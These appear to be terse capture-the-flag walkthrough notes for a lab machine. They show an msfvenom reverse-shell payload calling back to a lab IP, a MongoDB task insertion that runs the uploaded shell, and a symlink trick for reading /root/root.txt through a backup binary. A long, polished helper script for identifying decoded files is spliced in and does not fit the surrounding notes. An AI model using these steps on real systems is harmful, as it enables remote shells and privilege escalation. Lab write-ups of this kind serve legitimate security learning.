MongoDB creds found?

Try:

mongo -u username -p PASS <authSource>

where <authSource> is the authentication database (i.e. scheduler).

Note db.collection('NAME') for the database name.

msfvenom -p cmd/unix/reverse_python lhost=10.10.16.1 lport=9999 R

Upload the shell to the victim.

Then, on the victim, run:

db.tasks.insert({ "cmd": "/bin/bash /tmp/shell.sh;" } );

WriteResult({ "nInserted" : 1 })

Backup key found?

Copy the key and use it with:

./backup -q hashes /tmp

This will create a base64 file.

Decode it and see what kind of file it is.
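The decode-and-identify step above, as an added example that is not part of the original notes: it decodes a base64 file and names the format from its leading magic bytes, which helps when `file` is not installed. The function name `identify_b64`, the signature list and the sample input are constructed for illustration.

```shell
#!/bin/sh
# identify_b64 (hypothetical helper): decode a base64 file and report the
# container format from its first bytes. Signature list is illustrative.
identify_b64() {
    in=$1
    out=${2:-$in.decoded}
    # Stop on malformed base64 rather than inspecting partial garbage.
    if ! base64 --decode "$in" > "$out" 2>/dev/null; then
        echo "invalid-base64"
        return 1
    fi
    # First four bytes as lowercase hex with no separators.
    magic=$(head -c 4 "$out" | od -An -tx1 | tr -d ' \n')
    case $magic in
        504b0304) echo "zip" ;;
        1f8b*)    echo "gzip" ;;
        425a68*)  echo "bzip2" ;;
        fd377a58) echo "xz" ;;
        7f454c46) echo "elf" ;;
        *)        echo "unknown:$magic" ;;
    esac
}

# Constructed sample: only the 4-byte ZIP local-file-header signature.
sample=$(mktemp)
printf 'PK\003\004' | base64 > "$sample"
identify_b64 "$sample"
```

The decoded bytes are left in `<input>.decoded` (or the path given as the second argument) for further inspection.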

---

Link root.txt to a tmp file:

mkdir /tmp/gori

ln -s /root/root.txt /tmp/gori

/usr/local/bin/backup -q pass /tmp/gori > xxx
cat xxx | base64 --decode > xxx-d 
